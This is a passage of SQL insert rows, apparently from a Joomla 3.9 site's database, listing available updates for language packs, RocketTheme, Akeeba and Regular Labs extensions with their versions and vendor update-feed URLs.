US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26134,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26135,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26136,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26137,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26138,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26139,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26140,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26141,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26142,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26143,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26144,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26145,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26146,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26147,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26148,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26149,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26150,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26151,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26152,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26153,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26154,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26155,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26156,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26157,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26158,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26159,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26160,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26161,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26162,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26163,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26164,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26165,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26166,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26167,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26168,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26169,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26170,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26171,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26172,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26173,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26174,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26175,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26176,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26177,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26178,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26179,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26180,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26181,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26182,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26183,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26184,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26185,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26186,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26187,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26188,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26189,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26190,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26191,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26192,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26193,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26194,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26195,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26196,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26197,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26198,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26199,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26200,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26201,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26202,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26203,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26204,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26205,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26206,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26207,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26208,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26209,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26210,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26211,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26212,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26213,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26214,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26215,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26216,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26217,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26218,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26219,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26220,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26221,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26222,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26223,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26224,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26225,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26226,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26227,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26228,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26229,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26230,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26231,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26232,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26233,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26234,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26235,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26236,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26237,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26238,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26239,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26240,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26241,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26242,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26243,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26244,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26245,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26246,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26247,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26248,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26249,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26250,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26251,3,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26252,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26253,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26254,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26255,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26256,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26257,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26258,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26259,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26260,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26261,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26262,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26263,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26264,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26265,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26266,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26267,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26268,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26269,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26270,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26271,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26272,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26273,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26274,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26275,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26276,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26277,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(26278,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(26279,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(26280,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(26281,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(26282,20,0,'RokGallery','','','component','',0,'2.46','0802','http://updates.rockettheme.com/joomla/313/1985305838','',''),(26283,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(26284,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(26285,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(26286,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(26287,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26288,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26289,57,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26290,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(26291,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(26292,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(26293,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(26294,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(26295,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(26296,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(26297,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(26298,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(26299,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.22.2','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(26300,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(26301,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(26302,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(26303,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(26304,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(26305,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(26306,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(26307,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(26308,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(26309,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(26310,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(26311,57,0,'English US','','pkg_en-US','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(26312,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(26313,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(26314,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(26315,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(26316,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(26317,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(26318,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(26319,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(26320,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(26321,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(26322,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(26323,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(26324,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(26325,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(26326,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(26327,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(26328,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(26329,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(26330,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(26331,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(26332,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(26333,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(26334,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(26335,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(26336,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.1.1','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeeba.com/download/fef/1-1-1.html',''),(26337,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.3FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer/features',''),(26338,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.7.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeeba.com/download/fof3/3-7-1.html',''),(26339,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26340,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.5.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeeba.com/download/akeeba-backup/7-5-0-1.html',''),(26341,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26342,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26343,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26344,1,0,'Joomla','','joomla','file','',0,'3.9.23','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(26345,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.22.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(26346,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(26347,3,0,'French','','pkg_fr-FR','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(26348,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.23.1','','https://update.j